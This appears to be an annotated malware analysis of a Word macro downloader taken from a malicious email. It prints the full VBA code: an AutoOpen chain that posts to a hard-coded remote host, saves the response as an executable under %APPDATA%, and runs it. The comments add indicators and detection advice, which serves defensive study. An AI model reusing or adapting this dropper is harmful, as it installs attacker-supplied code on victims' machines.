Created
November 26, 2014 10:22
Hex-dump macro exploit from malicious mail
------------------------------------------------------------------------------- | |
ThisDocument.cls | |
Attribute VB_Name = "ThisDocument" | |
Attribute VB_Base = "1Normal.ThisDocument" | |
Attribute VB_GlobalNameSpace = False | |
Attribute VB_Creatable = False | |
Attribute VB_PredeclaredId = True | |
Attribute VB_Exposed = True | |
Attribute VB_TemplateDerived = True | |
Attribute VB_Customizable = True | |
------------------------------------------------------------------------------- | |
Module1.bas | |
Attribute VB_Name = "Module1" | |
' Help: one-line trampoline that calls Start, the download-and-run routine in this module.
' It has no logic of its own; in the visible code its only caller is AutoOpen.
Sub Help() | |
Start | |
End Sub | |
' AutoOpen: Word's auto-macro name. Word runs it when the document is opened,
' provided macros are allowed to execute.
' It calls Help, which calls Start, so the whole chain runs with no further user action.
' Analyst note: an AutoOpen entry point in a mailed document is a triage signal by itself.
' Blocking macro execution for documents that arrive by mail or from the internet stops the chain at this point.
Sub AutoOpen() | |
Help | |
End Sub | |
' Start: downloader/dropper stage. In order, the visible code:
'   1. issues a synchronous HTTP POST with no body to a hard-coded host,
'   2. takes the raw response bytes,
'   3. writes them to a fixed file name under the directory named by %APPDATA%,
'   4. runs that file with Shell.
' Nothing checks the HTTP status, the size or the type of the response before it is written and executed.
' Indicators visible in this routine (for hunting and blocking): the hard-coded URL host,
' the fixed User-Agent string, the "google.com" Referer value, and the dropped file name.
' Behavioural detection: an Office process that makes an outbound HTTP request, writes an .exe
' under the user's roaming profile and then spawns it as a child process.
Sub Start() | |
' Assigned to the undeclared variable Position further down and not read anywhere else in this routine (filler).
Const PositionBegin As Integer = 0 | |
' Name of the environment variable used to build the drop path.
Const EnvVar As String = "APPDATA" | |
' Fixed browser-like User-Agent string, so the request does not announce a scripting client.
' NOTE(review): whether the override actually reaches the wire depends on the XMLHTTP implementation; confirm against a capture.
Const UserAg As String = "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)" | |
' Late-bound COM HTTP client; NewObj is never declared (no Option Explicit is visible in this module).
Set NewObj = CreateObject("Msxml2.XMLHTTP") | |
' Third argument False = synchronous: the macro blocks until the response has arrived.
' Plain HTTP, so the transfer is visible to proxy and network inspection.
NewObj.Open "POST", "http://z5h1.biz/", False | |
NewObj.setRequestHeader "User-Agent", UserAg | |
' Static Referer value, the same on every run, so it is usable as a network signature together with the User-Agent.
NewObj.setRequestHeader "Referer", "google.com" | |
' send is called without an argument, so the POST carries no body.
NewObj.send | |
Dim X | |
' Raw response bytes; these are the payload that is written to disk below.
X = NewObj.responseBody | |
' ADODB.Stream is used as the binary file writer.
Set Stream = CreateObject("Adodb.Stream") | |
Stream.Open | |
' 0 + 1 evaluates to 1 (adTypeBinary). Writing the constant as arithmetic presumably hides the literal from simple string matching; not confirmed.
Stream.Type = 0 + 1 | |
Stream.Write X | |
' Position is undeclared and unused afterwards; this line has no effect on the download or the drop.
Position = PositionBegin | |
' Appdata is declared and never used in this routine.
Dim Appdata As String | |
Dim PresentationName As String | |
' Drop path: value of %APPDATA% plus a fixed file name, joined with a forward slash.
PresentationName = Environ(EnvVar) & "/presentation[en].exe" | |
' 1 + 1 evaluates to 2 (adSaveCreateOverWrite): an existing file of that name is overwritten.
Stream.SaveToFile PresentationName, 1 + 1 | |
' Runs the dropped file; vbNormalNoFocus starts it without taking focus from the current window.
' The Stream and the HTTP object are not closed or released in the visible code.
Shell PresentationName, vbNormalNoFocus | |
End Sub | |